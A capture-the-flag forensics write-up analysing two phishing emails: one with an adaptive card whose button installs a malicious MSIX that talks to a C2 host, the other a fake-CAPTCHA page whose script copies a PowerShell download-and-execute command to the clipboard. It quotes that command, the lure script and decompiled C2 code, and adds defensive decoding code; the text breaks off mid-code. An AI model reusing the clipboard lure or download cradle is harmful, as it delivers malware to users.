Scoreboard:

Link to my solved challenges, including time of solve
Youve got mail 2! (Forensics)
Dammit!… I did it again… But this time it seemed sooooo convincing? Like what even happened?…
Disclaimer: The handout file may be flagged as malware by antivirus software. It is recommended to run it in a sandbox or isolated environment.
Attached file: forensics_youvegotmailtwo.zip
Solution: After unzipping the zip file we get a .eml file. It is an email, and inside the email there is a very suspicious <script> block.
Raw payload (long output):
|
<script type=3D"application/ld+json" id=3D"ActionableMessageCardScript"> {
"@type": "SignedAdaptiveCard",
"@context": "http://schema.org/extensions",
"signedAdaptiveCard": "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsIng1YyI6Ik1JSU=
pTekNDQnpPZ0F3SUJBZ0lUVlFBRE5RWVJReDljd1lLVW5RQUFBQU0xQmpBTkJna3Foa2lHOXcwQ=
kFRd0ZBREJYTVFzd0NRWURWUVFHRXdKVlV6RWVNQndHQTFVRUNoTVZUV2xqY205emIyWjBJRU52=
Y25CdmNtRjBhVzl1TVNnd0pnWURWUVFERXg5TmFXTnliM052Wm5RZ1ZFeFRJRWN5SUZKVFFTQkR=
RU0JQUTFOUUlERTJNQjRYRFRJMk1ERXlNREl3TkRNeE5sb1hEVEkyTURjeE9USXdORE14Tmxvd2=
VERUxNQWtHQTFVRUJoTUNWVk14Q3pBSkJnTlZCQWdUQWxkQk1SQXdEZ1lEVlFRSEV3ZFNaV1J0Y=
jI1a01SNHdIQVlEVlFRS0V4Vk5hV055YjNOdlpuUWdRMjl5Y0c5eVlYUnBiMjR4S2pBb0JnTlZC=
QU1USVdWdmNHMWhhV3d1YjJSemNHNXZkR2xtZVM1emFHRnlaWEJ2YVc1MExtTnZiVENDQVNJd0R=
RWUpLb1pJaHZjTkFRRUJCUUFEZ2dFUEFEQ0NBUW9DZ2dFQkFLb2VTTStVL1hIS1hXY2ZVU2xxOT=
lNcTVoUlhRb2toNlBKei9LS293b3ErQjM0Rk9EQ0VkZGhuZ0pteGhzRGVaNFhLMUt5ZWc3Vjk4K=
1FMOXdJKytEdDM1dEF0QUY4NFFHbHZKbm93NzBXUFc0U3lTTmVqUU9GZUE4bDE5YkFYS2JLNnRL=
S1dLQTk4T2JlUW9VQUJaNklxMjhEWTlkWGlldFU1b2k3SXlPZEhuRDdNTmp1TUVzVUx6NmFTQzV=
yajd2TEZpNWhXdHFXTTcyd0llL25DdTNJRDE2NytmekJOTEpGbE1oOHV5bTBnRHc4VHBPUE42UH=
ZZaHRPTFE4NXZ0WFduZUlocDlwQjhuRHBJQUZSTXhDZUlGcGVZb3Jqc1kyWVRSOWMrQXR3by9DW=
FZWbVZzN2RrWG42c1EvdFhCRm9XT215Zit4ZjVuRW9zS1lKcC93dkVDQXdFQUFhT0NCTzB3Z2dU=
cE1JSUJmZ1lLS3dZQkJBSFdlUUlFQWdTQ0FXNEVnZ0ZxQVdnQWRnRFlDVlU3bEU5Ni84Z1dHVyt=
VVDRXcnNQajhYb2RWSmc4VjBTNXl1MFZMRkFBQUFadmRMdnBXQUFBRUF3QkhNRVVDSVFEYktvOG=
dsV0lHdlBkeGJPSlhBeTN2UmpkYm9oZ1d2K3pHZTRveHZ1dHFUUUlnZW8zTVNjcEFEK0JoUEVNM=
3FNblVwTGc4Qzlpb3ExTnZhTTlDQ2pqdUx3RUFkUURDTVg1WFJSbWpSZTUvT042eWtFSHJ4OElo=
V2lLL2Y5VzFyWGFhMlE1U3pRQUFBWnZkTHZzV0FBQUVBd0JHTUVRQ0lFTERJZWd1bThjOW5hUUl=
4alpRbkhlSHlGazliWDFPQnNWZFh2c283QVhwQWlCdjNCSlh1R2lIYk04dzNSVkF2SU95YkRtRX=
hDT0JnbkdraFhIZFpSZnRwUUIzQU1panhIL0hzNjI1TldzQlAycDZFbTNqT2s1RHBjWkcrWmV0T=
1hXWkhjK2FBQUFCbTkwdSt5QUFBQVFEQUVnd1JnSWhBTks1ekRqdTJrd3NGaXJCb1AvODAwcjBU=
cnNkdGFLQlc3M2VHUXhQcWdPcUFpRUFxOHBSM0pHNnJYTDhMdGluamNpSHJuekxDUy9jMGhDQXp=
3YUpnWC8yTGpVd0d3WUpLd1lCQkFHQ054VUtCQTR3RERBS0JnZ3JCZ0VGQlFjREFUQThCZ2tyQm=
dFRUFZSTNGUWNFTHpBdEJpVXJCZ0VFQVlJM0ZRaUh2ZGNiZ2VmclJvS0JuUzZPMEF5SDhOb2RYW=
VBwdzJlQ3RLTk1BZ0ZrQWdFZ01JSUJDd1lJS3dZQkJRVUhBUUVFZ2Y0d2dmc3dZUVlJS3dZQkJR=
VUhNQUtHVldoMGRIQTZMeTkzZDNjdWJXbGpjbTl6YjJaMExtTnZiUzl3YTJsdmNITXZZMlZ5ZEh=
NdlRXbGpjbTl6YjJaMEpUSXdWRXhUSlRJd1J6SWxNakJTVTBFbE1qQkRRU1V5TUU5RFUxQWxNak=
F4Tmk1amNuUXdad1lJS3dZQkJRVUhNQUtHVzJoMGRIQTZMeTlqWVdsemMzVmxjbk11YldsamNtO=
XpiMlowTG1OdmJTOXdhMmx2Y0hNdlkyVnlkSE12VFdsamNtOXpiMlowSlRJd1ZFeFRKVEl3UnpJ=
bE1qQlNVMEVsTWpCRFFTVXlNRTlEVTFBbE1qQXhOaTVqY25Rd0xRWUlLd1lCQlFVSE1BR0dJV2g=
wZEhBNkx5OXZibVZ2WTNOd0xtMXBZM0p2YzI5bWRDNWpiMjB2YjJOemNEQWRCZ05WSFE0RUZnUV=
VNWmoxOTlHT1pXZWdpN3RRbG5NWnA5UHdaWGt3RGdZRFZSMFBBUUgvQkFRREFnV2dNQ3dHQTFVZ=
EVRUWxNQ09DSVdWdmNHMWhhV3d1YjJSemNHNXZkR2xtZVM1emFHRnlaWEJ2YVc1MExtTnZiVEFN=
QmdOVkhSTUJBZjhFQWpBQU1JSHhCZ05WSFI4RWdla3dnZVl3Z2VPZ2dlQ2dnZDJHYkdoMGRIQTZ=
MeTkzZDNjdWJXbGpjbTl6YjJaMExtTnZiUzl3YTJsdmNITXZZM0pzTDNCaGNuUnBkR2x2Ymk5Tm=
FXTnliM052Wm5RbE1qQlVURk1sTWpCSE1pVXlNRkpUUVNVeU1FTkJKVEl3VDBOVFVDVXlNREUyW=
DFCaGNuUnBkR2x2YmpBd01EWTRMbU55YkladGFIUjBjRG92TDJOeWJESXViV2xqY205emIyWjBM=
bU52YlM5d2EybHZjSE12WTNKc0wzQmhjblJwZEdsdmJpOU5hV055YjNOdlpuUWxNakJVVEZNbE1=
qQkhNaVV5TUZKVFFTVXlNRU5CSlRJd1QwTlRVQ1V5TURFMlgxQmhjblJwZEdsdmJqQXdNRFk0TG=
1OeWJEQm1CZ05WSFNBRVh6QmRNQWdHQm1lQkRBRUNBakJSQmd3ckJnRUVBWUkzVElOOUFRRXdRV=
EEvQmdnckJnRUZCUWNDQVJZemFIUjBjRG92TDNkM2R5NXRhV055YjNOdlpuUXVZMjl0TDNCcmFX=
OXdjeTlFYjJOekwxSmxjRzl6YVhSdmNua3VhSFJ0TUI4R0ExVWRJd1FZTUJhQUZBWTU4RmJSN1p=
ESU5xT2dENVQrWXBTbjV2dzNNQk1HQTFVZEpRUU1NQW9HQ0NzR0FRVUZCd01CTUEwR0NTcUdTSW=
IzRFFFQkRBVUFBNElDQVFCZmE5TW1DeUI4bGlzeGpFR0ZQRWRsZDU1ci9ZTWJITEFlbFo5akFRL=
0laeFB6MFRxaTRjMU5QKy8wOTE1d05GSk1rS1l2OGFlc1JpTmFUNHZ5MFQ1VGVSQWo4anFqbm1i=
OU9sSlF2R3lJTGQzUWhTZHEzSXhqeTdaRFdTOGkxb3JYOTJOeXVwbFJ4QjZvQkRmZG42NlRhTFo=
yQ3pubmxPTTdDSFN0MFgxUGFrc2J2U2dYTFN0czE0UjN6VGVudmVUenF4czFZRUVLdVhITDFNcD=
NpemdraUxwdTNvMVEwTDNOMjgwbVpvbkdnMXJ1TW5GZ2svaFFqakZEY0d1UWNDbVZHdEl3KzZPT=
2FlMGoxcDBZeE5xS0RXbEE3SUpYTHRKUDdQbVdNQ2FsTlJhYXVSZ2tqMGNnRWQ0WVhrYzdEWEhm=
OEhpMStydFdVWjA1MjF3dFo2QXZ0ZWY3dGhoZ0t2MXErcW1ud0FqS0hpMC9SckhpZktGUVRXeHV=
oQTBtZk5YWGh1cStBSGdoRGhxQm43LzJ1QWlnQXVXeUFOcU85RnZDNkp3VXFKZkcxSnA0V1gzb3=
FhTFU2S3RKc2NuaHQxcDVoV1NHWmdqbk9EdDRNOFl3aUNydk5PWFVWUnVCNnFBc0YyY2YxZmNoO=
XZSV3lJOHZIWnFFRmVCc3NNWEowbEZSdVYxeHVFNkduR0tUQkVmdXNTMmhFZzlydzBjU2NRV0Vx=
SGFibXRKZ3dPT1dFMDkrUVdyeUJ6QW95ZERGUlVXN1N4QXJSaVF3T1JvMmFnWU85cjVsNEJWdkd=
UZ0FvNzN1TWNnd202dzlUWW1kTlgvbEZHcXROUG9jWnJnN0MyWVlwN1JqMUxlV0FIOU5pVEZhOW=
VkM1NTa0ZvZVpHY3pmOEw3S3RtVjVYalE9PSJ9eyJzZW5kZXIiOiJqZW5zLm15cnVwQGNhcm5wZ=
mlyZS5kZGMiLCJvcmlnaW5hdG9yIjoiYWJkMTdiNGItZTM2My00OTdhLTkwZGMtYTFhNjNiM2I5=
NWM1IiwiYWRhcHRpdmVDYXJkU2VyaWFsaXplZCI6IntcbiAgICAiJHNjaGVtYSI6ICJodHRwOi8=
vYWRhcHRpdmVjYXJkcy5pby9zY2hlbWFzL2FkYXB0aXZlLWNhcmQuanNvbiIsXG4gICAgInR5cG=
UiOiAiQWRhcHRpdmVDYXJkIixcbiAgICAidmVyc2lvbiI6ICIxLjAiLFxuICAgICJib2R5IjogW=
1xuICAgICAgICB7XG4gICAgICAgICAgICAidHlwZSI6ICJDb2x1bW5TZXQiLFxuICAgICAgICAg=
ICAgImlkIjogIjFlZGUyYWJhLTYxYjktZmFhMC05ODk1LTllZDBjMjZiMmU2ZiIsXG4gICAgICA=
gICAgICAiY29sdW1ucyI6IFtcbiAgICAgICAgICAgICAgICB7XG4gICAgICAgICAgICAgICAgIC=
AgICJ0eXBlIjogIkNvbHVtbiIsXG4gICAgICAgICAgICAgICAgICAgICJpZCI6ICJlNTc1NjI0M=
i0wOTYzLTM3YTItN2NiNC00Mzk3ODg2ZDYwYmIiLFxuICAgICAgICAgICAgICAgICAgICAicGFk=
ZGluZyI6ICJOb25lIixcbiAgICAgICAgICAgICAgICAgICAgIndpZHRoIjogInN0cmV0Y2giLFx=
uICAgICAgICAgICAgICAgICAgICAiaXRlbXMiOiBbXG4gICAgICAgICAgICAgICAgICAgICAgIC=
B7XG4gICAgICAgICAgICAgICAgICAgICAgICAgICAgInR5cGUiOiAiVGV4dEJsb2NrIixcbiAgI=
CAgICAgICAgICAgICAgICAgICAgICAgICAiaWQiOiAiMjBmMzgzM2UtMDQzNS01Yzg3LWZhZDEt=
YjUyOGUwMDQ2ZmI2IixcbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAidGV4dCI6ICJNaWN=
yb3NvZnQgU2VjdXJlIEVtYWlscyIsXG4gICAgICAgICAgICAgICAgICAgICAgICAgICAgIndyYX=
AiOiB0cnVlXG4gICAgICAgICAgICAgICAgICAgICAgICB9XG4gICAgICAgICAgICAgICAgICAgI=
F0sXG4gICAgICAgICAgICAgICAgICAgICJ2ZXJ0aWNhbENvbnRlbnRBbGlnbm1lbnQiOiAiQ2Vu=
dGVyIlxuICAgICAgICAgICAgICAgIH0sXG4gICAgICAgICAgICAgICAge1xuICAgICAgICAgICA=
gICAgICAgICAidHlwZSI6ICJDb2x1bW4iLFxuICAgICAgICAgICAgICAgICAgICAiaWQiOiAiNz=
QyMTVhMjYtZmE4Yi1lNTQ5LWNjZWQtN2Y5OWZkMzRhNjYxIixcbiAgICAgICAgICAgICAgICAgI=
CAgInBhZGRpbmciOiAiTm9uZSIsXG4gICAgICAgICAgICAgICAgICAgICJ3aWR0aCI6ICJhdXRv=
IixcbiAgICAgICAgICAgICAgICAgICAgIml0ZW1zIjogW10sXG4gICAgICAgICAgICAgICAgICA=
gICJob3Jpem9udGFsQWxpZ25tZW50IjogIlJpZ2h0IlxuICAgICAgICAgICAgICAgIH1cbiAgIC=
AgICAgICAgIF0sXG4gICAgICAgICAgICAicGFkZGluZyI6IHtcbiAgICAgICAgICAgICAgICAid=
G9wIjogIlNtYWxsIixcbiAgICAgICAgICAgICAgICAiYm90dG9tIjogIlNtYWxsIixcbiAgICAg=
ICAgICAgICAgICAibGVmdCI6ICJEZWZhdWx0IixcbiAgICAgICAgICAgICAgICAicmlnaHQiOiA=
iU21hbGwiXG4gICAgICAgICAgICB9LFxuICAgICAgICAgICAgInN0eWxlIjogImVtcGhhc2lzIl=
xuICAgICAgICB9LFxuICAgICAgICB7XG4gICAgICAgICAgICAidHlwZSI6ICJDb250YWluZXIiL=
FxuICAgICAgICAgICAgImlkIjogInBhZ2UyIixcbiAgICAgICAgICAgICJwYWRkaW5nIjogIkRl=
ZmF1bHQiLFxuICAgICAgICAgICAgIml0ZW1zIjogW1xuICAgICAgICAgICAgICAgIHtcbiAgICA=
gICAgICAgICAgICAgICAgInR5cGUiOiAiVGV4dEJsb2NrIixcbiAgICAgICAgICAgICAgICAgIC=
AgImlkIjogImMzMTk4ODU2LWU3NWItNDIxMy04YjAyLWY0Mzk2MzcxNTBjZCIsXG4gICAgICAgI=
CAgICAgICAgICAgICJ0ZXh0IjogIkVycm9yISIsXG4gICAgICAgICAgICAgICAgICAgICJ3cmFw=
IjogdHJ1ZSxcbiAgICAgICAgICAgICAgICAgICAgInNpemUiOiAiTGFyZ2UiLFxuICAgICAgICA=
gICAgICAgICAgICAid2VpZ2h0IjogIkJvbGRlciJcbiAgICAgICAgICAgICAgICB9LFxuICAgIC=
AgICAgICAgICAgIHtcbiAgICAgICAgICAgICAgICAgICAgInR5cGUiOiAiVGV4dEJsb2NrIixcb=
iAgICAgICAgICAgICAgICAgICAgImlkIjogIjFhOWFhZmVjLTQwMmItNzlmYi0zNDBjLWNjY2I3=
MTU0MjMzNSIsXG4gICAgICAgICAgICAgICAgICAgICJ0ZXh0IjogIllvdXIgbWFjaGluZSBkb2V=
zIG5vdCBzdXBwb3J0IHRoZSByZXF1aXJlZCBmZWF0dXJlcyBmb3Igb3BlbmluZyBhbiBlbmNyeX=
B0ZWQgZW1haWwuIFBsZWFzZSBlbmFibGUgdGhlIGZlYXR1cmUgdG8gdmlldyB0aGUgbWVzc2FnZ=
SIsXG4gICAgICAgICAgICAgICAgICAgICJ3cmFwIjogdHJ1ZVxuICAgICAgICAgICAgICAgIH0s=
XG4gICAgICAgICAgICAgICAge1xuICAgICAgICAgICAgICAgICAgICAidHlwZSI6ICJBY3Rpb25=
TZXQiLFxuICAgICAgICAgICAgICAgICAgICAiaWQiOiAiYjc0Y2Q2ZTgtNjMzOC1lMzZjLWZhNG=
EtNzNmZTBhMzA5MGRmIixcbiAgICAgICAgICAgICAgICAgICAgImFjdGlvbnMiOiBbXG4gICAgI=
CAgICAgICAgICAgICAgICAgICB7XG4gICAgICAgICAgICAgICAgICAgICAgICAgICAgInR5cGUi=
OiAiQWN0aW9uLk9wZW5VcmwiLFxuICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpZCI6ICI=
zNWUwNGQzYy1jOGZlLWNhYWItOWRiOC1jYWE1NGIwMDgzZmEiLFxuICAgICAgICAgICAgICAgIC=
AgICAgICAgICAgICJ0aXRsZSI6ICJFbmFibGUgRmVhdHVyZSIsXG4gICAgICAgICAgICAgICAgI=
CAgICAgICAgICAgInVybCI6ICJtcy1hcHBpbnN0YWxsZXI6P3NvdXJjZT1odHRwczovL3NlY3Vy=
ZWVtYWlsLmN0ZnRlY2gudWsvaW5zdGFsbGVyLm1zaXgiLFxuICAgICAgICAgICAgICAgICAgICA=
gICAgICAgICJzdHlsZSI6ICJwb3NpdGl2ZSIsXG4gICAgICAgICAgICAgICAgICAgICAgICAgIC=
AgImlzUHJpbWFyeSI6IHRydWVcbiAgICAgICAgICAgICAgICAgICAgICAgIH1cbiAgICAgICAgI=
CAgICAgICAgICAgXSxcbiAgICAgICAgICAgICAgICAgICAgImhvcml6b250YWxBbGlnbm1lbnQi=
OiAiUmlnaHQiXG4gICAgICAgICAgICAgICAgfVxuICAgICAgICAgICAgXSxcbiAgICAgICAgICA=
gICJpc1Zpc2libGUiOiBmYWxzZVxuICAgICAgICB9LFxuICAgICAgICB7XG4gICAgICAgICAgIC=
AidHlwZSI6ICJDb250YWluZXIiLFxuICAgICAgICAgICAgImlkIjogInBhZ2UxIixcbiAgICAgI=
CAgICAgICJwYWRkaW5nIjogIkRlZmF1bHQiLFxuICAgICAgICAgICAgInNwYWNpbmciOiAiTm9u=
ZSIsXG4gICAgICAgICAgICAiaXRlbXMiOiBbXG4gICAgICAgICAgICAgICAge1xuICAgICAgICA=
gICAgICAgICAgICAidHlwZSI6ICJUZXh0QmxvY2siLFxuICAgICAgICAgICAgICAgICAgICAiaW=
QiOiAiNDQ5MDY3OTctMjIyZi05ZmUyLTBiN2EtZTNlZTIxYzZlMzgwIixcbiAgICAgICAgICAgI=
CAgICAgICAgInRleHQiOiAiWW91IGhhdmUgYSBuZXcgZW5jcnlwdGVkIGVtYWlsIixcbiAgICAg=
ICAgICAgICAgICAgICAgIndyYXAiOiB0cnVlLFxuICAgICAgICAgICAgICAgICAgICAid2VpZ2h=
0IjogIkJvbGRlciIsXG4gICAgICAgICAgICAgICAgICAgICJzaXplIjogIkxhcmdlIixcbiAgIC=
AgICAgICAgICAgICAgICAgInN0eWxlIjogImhlYWRpbmciXG4gICAgICAgICAgICAgICAgfSxcb=
iAgICAgICAgICAgICAgICB7XG4gICAgICAgICAgICAgICAgICAgICJ0eXBlIjogIlRleHRCbG9j=
ayIsXG4gICAgICAgICAgICAgICAgICAgICJpZCI6ICJmN2FiZGYxYS0zY2NlLTIxNTktMjhlZi1=
mMmYzNjJlYzkzN2UiLFxuICAgICAgICAgICAgICAgICAgICAidGV4dCI6ICJZb3UgaGF2ZSByZW=
NpZXZlZCBhbiBlbmNyeXB0ZWQgZW1haWwgZnJvbSBcXCJqZW5zLm15cnVwQGN5YmVybWVzdGVyc=
2thYmVybmUuZGRjXFwiIHdpdGggdGhlIHN1YmplY3QgXFwiQ3JlZGVudGlhbHMgZm9yIENURmRc=
XCIiLFxuICAgICAgICAgICAgICAgICAgICAid3JhcCI6IHRydWVcbiAgICAgICAgICAgICAgICB=
9LFxuICAgICAgICAgICAgICAgIHtcbiAgICAgICAgICAgICAgICAgICAgInR5cGUiOiAiQWN0aW=
9uU2V0IixcbiAgICAgICAgICAgICAgICAgICAgImlkIjogImE0YjdmNmZhLWYwOWMtMzI0MC0wM=
TA3LWJhOTZkYTUwNDcxYyIsXG4gICAgICAgICAgICAgICAgICAgICJhY3Rpb25zIjogW1xuICAg=
ICAgICAgICAgICAgICAgICAgICAge1xuICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ0eXB=
lIjogIkFjdGlvbi5Ub2dnbGVWaXNpYmlsaXR5IixcbiAgICAgICAgICAgICAgICAgICAgICAgIC=
AgICAiaWQiOiAiZDg2OTA1NmMtZTQzNi0xOGYxLTE5MzgtYTAzN2RhNmRiOGM4IixcbiAgICAgI=
CAgICAgICAgICAgICAgICAgICAgICAidGl0bGUiOiAiVmlldyBtZXNzYWdlIixcbiAgICAgICAg=
ICAgICAgICAgICAgICAgICAgICAidGFyZ2V0RWxlbWVudHMiOiBbXG4gICAgICAgICAgICAgICA=
gICAgICAgICAgICAgICAgIHtcbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC=
JlbGVtZW50SWQiOiAicGFnZTEiLFxuICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI=
CAgImlzVmlzaWJsZSI6IGZhbHNlXG4gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0s=
XG4gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHtcbiAgICAgICAgICAgICAgICAgICA=
gICAgICAgICAgICAgICAgICJlbGVtZW50SWQiOiAicGFnZTIiLFxuICAgICAgICAgICAgICAgIC=
AgICAgICAgICAgICAgICAgICAgImlzVmlzaWJsZSI6IHRydWVcbiAgICAgICAgICAgICAgICAgI=
CAgICAgICAgICAgICAgfVxuICAgICAgICAgICAgICAgICAgICAgICAgICAgIF0sXG4gICAgICAg=
ICAgICAgICAgICAgICAgICAgICAgInN0eWxlIjogInBvc2l0aXZlIixcbiAgICAgICAgICAgICA=
gICAgICAgICAgICAgICAiaXNQcmltYXJ5IjogdHJ1ZVxuICAgICAgICAgICAgICAgICAgICAgIC=
AgfVxuICAgICAgICAgICAgICAgICAgICBdLFxuICAgICAgICAgICAgICAgICAgICAiaG9yaXpvb=
nRhbEFsaWdubWVudCI6ICJSaWdodCJcbiAgICAgICAgICAgICAgICB9XG4gICAgICAgICAgICBd=
XG4gICAgICAgIH1cbiAgICBdLFxuICAgICJwYWRkaW5nIjogIk5vbmUiLFxuICAgICJAdHlwZSI=
6ICJBZGFwdGl2ZUNhcmQiLFxuICAgICJAY29udGV4dCI6ICJodHRwOi8vc2NoZW1hLm9yZy9leH=
RlbnNpb25zIixcblx0ZXhwZWN0ZWRBY3RvcnM6IFtcbiAgXHQgIG51bGxcblx0XSxcblx0aGlkZ=
U9yaWdpbmFsQm9keTogdHJ1ZSxcblx0cnRsOiBmYWxzZVxufSIsImlhdCI6IjE3NzE0MjcwODgi=
LCJyZWNpcGllbnRzU2VyaWFsaXplZCI6IltcIm9mZmVyLnNvZXJlbnNlbkBob3RtYWlsLmRkY1w=
iXSJ9"
} </script>
|
If we remove all the equals signs and all newlines and then base64 decode it, we get a lot of JSON data along with the contents of a JWT token. (The trailing = on each line and the =3D sequences are quoted-printable encoding of the email body: a trailing = is a soft line break and =3D is a literal equals sign.) The important part here is one very specific piece of the AdaptiveCard we find, namely:
|
{
"type": "ActionSet",
"id": "b74cd6e8-6338-e36c-fa4a-73fe0a3090df",
"actions": [
{
"type": "Action.OpenUrl",
"id": "35e04d3c-c8fe-caab-9db8-caa54b0083fa",
"title": "Enable Feature",
"url": "ms-appinstaller:?source=https://secureemail.ctftech.uk/installer.msix",
"style": "positive",
"isPrimary": true
}
],
"horizontalAlignment": "Right"
}
|
Among all of this we find a URL, "url": "ms-appinstaller:?source=https://secureemail.ctftech.uk/installer.msix", which points to an .msix file. This is a Microsoft installer package that can be installed on Windows 10 and 11, and the ms-appinstaller: URI scheme hands the package straight to Windows App Installer when the button is clicked. If you download this file, it can be opened like any zip archive, and inside it we find 3 XML files and a main.exe file. installer.msix (mirror)
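As an added example (not code from this writeup), the following Python automates the decoding described above: it undoes the quoted-printable wrapping of the <script> block, pulls out the signedAdaptiveCard value, base64-decodes it, walks the JSON objects inside the blob, parses adaptiveCardSerialized and lists every Action.OpenUrl target whose scheme is not plain http(s), which is how the ms-appinstaller: button surfaces. The email fragment it runs on is constructed here to mirror the structure of the real one; the example.invalid URLs and the placeholder certificate are assumptions, not values from the challenge. The lenient base64 step also tolerates a dotted JWT, so it goes slightly beyond the single blob seen in this challenge.

```python
import base64
import json
import quopri
import re


# Constructed sample (not the challenge .eml): a minimal Actionable Message
# <script> block in the quoted-printable shape seen in the email ('=' encoded
# as =3D, long lines soft-wrapped with a trailing '='). As in the decoded
# challenge blob, the signedAdaptiveCard value is a JWT header JSON followed
# directly by the payload JSON, both inside one base64 string.
def build_sample_fragment() -> str:
    header = {"alg": "RS256", "typ": "JWT", "x5c": "PLACEHOLDER-CERT-CHAIN"}
    card = {
        "type": "AdaptiveCard",
        "body": [
            {"type": "TextBlock", "text": "You have a new encrypted email"},
            {"type": "ActionSet", "actions": [
                {"type": "Action.OpenUrl", "title": "Enable Feature",
                 "url": "ms-appinstaller:?source=https://example.invalid/installer.msix"},
                {"type": "Action.OpenUrl", "title": "Help",
                 "url": "https://example.invalid/help"},
            ]},
        ],
    }
    payload = {"sender": "sender@example.invalid",
               "adaptiveCardSerialized": json.dumps(card)}
    blob = (json.dumps(header) + json.dumps(payload)).encode()
    script = ('<script type="application/ld+json" id="ActionableMessageCardScript"> {\n'
              '"@type": "SignedAdaptiveCard",\n'
              '"signedAdaptiveCard": "' + base64.b64encode(blob).decode() + '"\n'
              '} </script>')
    return quopri.encodestring(script.encode()).decode()


def decode_qp(fragment: str) -> str:
    """Undo quoted-printable: join soft line breaks and turn =3D back into '='."""
    return quopri.decodestring(fragment.encode()).decode()


def extract_signed_card(html: str) -> str:
    m = re.search(r'"signedAdaptiveCard"\s*:\s*"([^"]+)"', html)
    if not m:
        raise ValueError("no signedAdaptiveCard value found")
    return m.group(1)


def lenient_b64decode(value: str) -> bytes:
    """Drop anything outside the base64 alphabet (JWT dots, stray '='), then re-pad."""
    value = re.sub(r"[^A-Za-z0-9+/_-]", "", value).replace("-", "+").replace("_", "/")
    return base64.b64decode(value + "=" * (-len(value) % 4))


def json_objects(data: bytes) -> list:
    """Pull every top-level JSON object out of a blob of concatenated JSON."""
    text = data.decode("utf-8", errors="replace")
    decoder = json.JSONDecoder()
    objects, pos = [], 0
    while True:
        start = text.find("{", pos)
        if start < 0:
            break
        try:
            obj, pos = decoder.raw_decode(text, start)
        except json.JSONDecodeError:
            break  # e.g. a raw signature after the payload
        objects.append(obj)
    return objects


def open_url_actions(node) -> list:
    """Recursively collect the url of every Action.OpenUrl in a card."""
    found = []
    if isinstance(node, dict):
        if node.get("type") == "Action.OpenUrl" and "url" in node:
            found.append(node["url"])
        for value in node.values():
            found.extend(open_url_actions(value))
    elif isinstance(node, list):
        for item in node:
            found.extend(open_url_actions(item))
    return found


def suspicious_card_urls(fragment: str) -> list:
    """Action.OpenUrl targets that are not plain http(s) links, e.g. ms-appinstaller:."""
    blob = lenient_b64decode(extract_signed_card(decode_qp(fragment)))
    urls = []
    for obj in json_objects(blob):
        serialized = obj.get("adaptiveCardSerialized")
        if isinstance(serialized, str):
            urls.extend(open_url_actions(json.loads(serialized)))
    return [u for u in urls if not re.match(r"https?://", u, re.I)]
```

Run it over the raw text of the <script> element from the .eml (copy from the opening tag to the closing tag, soft breaks included) and it prints the same ms-appinstaller: URL the manual decoding found; any non-http(s) scheme in an OpenUrl action of a mail card is worth a second look.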
After looking at the main.exe file in Binary Ninja, we find a function that makes network requests to long-recipe-da01.oluf-sand.workers.dev, sending data to /api/args and receiving data from /api/result. This looks like classic C2 communication.
|
int16_t* sub_402270()
{
int32_t var_8 = 0xffffffff;
int32_t (* var_c)(void* arg1) = sub_41af06;
TEB* fsbase;
struct _EXCEPTION_REGISTRATION_RECORD* ExceptionList = fsbase->NtTib.ExceptionList;
int32_t __saved_ebp;
int32_t eax_2 = __security_cookie ^ &__saved_ebp;
int32_t var_184 = eax_2;
fsbase->NtTib.ExceptionList = &ExceptionList;
void var_44;
sub_404850(&var_44, u"long-recipe-da01.oluf-sand.workers.dev");
int32_t var_8_1 = 0;
int16_t var_150 = 0x1bb;
void var_74;
sub_404850(&var_74, u"/api/args");
var_8_1 = 1;
void var_5c;
sub_404850(&var_5c, u"/api/result");
var_8_1 = 2;
void var_2c;
sub_404650(&var_2c);
var_8_1 = 3;
int16_t* result;
if (sub_401980(&var_44, 0x1bb, &var_74, &var_2c))
{
int32_t var_14c;
sub_404920(&var_14c);
var_8_1 = 4;
if (sub_401470(&var_2c, &var_14c))
{
void var_a4;
sub_404650(&var_a4);
var_8_1 = 5;
uint32_t var_140 = 0;
if (sub_401e80(&var_14c, &var_a4, &var_140))
{
void var_134;
int32_t* eax_10 = sub_407010(&var_134, var_140);
var_8_1 = 6;
var_8_1 = 7;
var_8_1 = 8;
var_8_1 = 9;
var_8_1 = 0xa;
void var_11c;
void var_104;
void var_ec;
void var_d4;
void var_bc;
sub_402970(&var_bc,
sub_402930(&var_d4,
sub_402970(&var_ec,
sub_4029b0(&var_104, "{"output":"", sub_401630(&var_11c, &var_a4)),
"","exit_code":"),
eax_10),
"}");
...
|
If we use curl to send a request to long-recipe-da01.oluf-sand.workers.dev/api/args we get PowerShell commands, but note that the response changes every time:

Flag: DDC{pl34s3_t3ll_m3_y0u_r4n_th1s_1n_4_s4ndb0x}
Youve got mail! (Forensics)
I um… might have clicked something I shouldn’t have… I swear I didn’t mean to! I just wanted to see if it was really the flags being shared - to let Jens know I mean! Anyway, can you help me out?
Disclaimer: The handout file may be flagged as malware by antivirus software. It is recommended to run it in a sandbox or isolated environment.
Attached file: forensics_youvegotmail.zip
Solution: This is once again a suspicious-looking email, containing an HTML file called SecureMessage.html. In this HTML file we find something that looks very much like the fake CAPTCHAs that hide malware.
|
document.onkeydown = () => {
const type = "text/plain";
const clipboardItemData = {
[type]: 'powershell.exe -ExecutionPolicy Bypass -c "iwr -UseBasicParsing jolly-heart-a4be.oluf-sand.workers.dev|iex";# Enable-Feature -Name EncryptedEmails ',
};
const clipboardItem = new ClipboardItem(clipboardItemData);
navigator.clipboard.write([clipboardItem]);
}
|
If the person who opens this email copies the text and runs it in the Windows Run dialog, it executes a PowerShell command that downloads and runs code from jolly-heart-a4be.oluf-sand.workers.dev. Note that the handler fires on any keypress (document.onkeydown) and silently overwrites the clipboard, so the victim does not even have to copy anything themselves; the page only has to persuade them to paste.
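For triage of an attachment like SecureMessage.html, a static check for this lure pattern (an event handler that writes a command-line download cradle into the clipboard) is enough to flag the file before anyone opens it in a browser. The scanner below is an added example, not part of the writeup; the HTML it scans is a constructed stand-in that mirrors the handler above with an example.invalid placeholder host.

```python
import re

# Constructed stand-in for an attachment like SecureMessage.html: the handler
# mirrors the one on the page (overwrite the clipboard with a download cradle
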